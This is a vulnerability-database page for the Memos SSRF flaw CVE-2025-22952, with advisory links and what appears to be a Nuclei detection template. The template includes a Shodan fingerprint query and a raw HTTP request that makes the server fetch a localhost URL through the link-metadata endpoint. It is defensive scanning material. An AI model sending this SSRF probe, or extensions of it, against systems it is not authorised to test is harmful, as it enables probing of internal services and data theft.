| Reporter | Title | Published | Views | Family All 27 |
|---|---|---|---|---|
| CVE-2025-22952 | 27 Feb 202521:59 | – | circl | |
| Memos 安全漏洞 | 27 Feb 202500:00 | – | cnnvd | |
| CVE-2025-22952 | 27 Feb 202500:00 | – | cve | |
| CVE-2025-22952 | 27 Feb 202500:00 | – | cvelist | |
| Memos Server-Side Request Forgery (SSRF) | 27 Feb 202521:32 | – | github | |
| CVE-2025-22952 | 27 Feb 202520:16 | – | nvd | |
| GHSA-WFXG-V3J4-7QMJ Memos Server-Side Request Forgery (SSRF) | 27 Feb 202521:32 | – | osv | |
| GO-2025-3492 Memos Server-Side Request Forgery (SSRF) in github.com/usememos/memos | 3 Mar 202519:22 | – | osv | |
| OPENSUSE-SU-2025:14889-1 govulncheck-vulndb-0.0.20250312T181707-1.1 on GA media | 13 Mar 202500:00 | – | osv | |
| PT-2025-6100 | 10 Feb 202500:00 | – | ptsecurity |
id: CVE-2025-22952
info:
name: Elestio Memos <= v0.24.0 - Server-Side Request Forgery
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
elestio memos v0.23.0 is vulnerable to Server-Side Request Forgery (SSRF) due to insufficient validation of user-supplied URLs, which can be exploited to perform SSRF attacks.
impact: |
Unauthenticated attackers can exploit SSRF vulnerabilities to access internal services, bypass network security controls, and potentially retrieve sensitive information from internal systems.
remediation: |
Upgrade to Memos version 0.24.1 or later that properly validates and restricts URL access.
reference:
- https://github.com/advisories/GHSA-wfxg-v3j4-7qmj
- https://elest.io/open-source/memos
- https://github.com/usememos/memos
- https://github.com/usememos/memos/issues/4413
- https://github.com/usememos/memos/pull/4428
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2025-22952
cwe-id: CWE-918
epss-score: 0.02818
epss-percentile: 0.8483
metadata:
verified: true
max-request: 1
shodan-query: http.favicon.hash:-1924700661
tags: cve,cve2025,elestio,memos,ssrf,oast,vuln,vkev
http:
- raw:
- |
GET /api/v1/markdown/link:metadata?link=http://localhost:13042 HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'localhost:13042'
- 'connect: connection refused'
condition: and
- type: word
part: content_type
words:
- 'application/json'
- type: status
status:
- 500
# digest: 4a0a0047304502210091104d57b41ee7926c1f48502c49dfda1795d17c19b917c6679a5b14c940268802202878d1a3c6feb5a0d3f274b1e7ed46c8ab3d2441ff1f3573a6046e6f1bb4014a:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation